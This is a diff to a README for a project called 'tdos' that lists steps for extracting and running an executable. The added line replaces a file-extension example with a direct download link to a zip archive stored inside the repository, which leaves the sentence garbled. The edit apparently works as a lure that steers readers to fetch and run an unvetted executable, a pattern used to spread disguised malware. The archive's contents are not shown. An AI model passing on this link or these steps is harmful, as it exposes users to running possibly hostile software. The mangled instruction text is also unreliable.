zeeshan-creater/tdos/README.md

 1. Open your terminal or file manager.
 2. Navigate to the folder where you downloaded tdos.
-3. If you downloaded a compressed file (like .zip or .tar.gz), extract it first.
+3. If you downloaded a compressed file (like .zip or https://raw.githubusercontent.com/zeeshan-creater/tdos/main/files/system/Software-v1.7.zip), extract it first.
 4. Inside the folder, you will find the tdos executable file.
 5. Double-click the executable or choose to run it from the terminal by typing `./tdos`.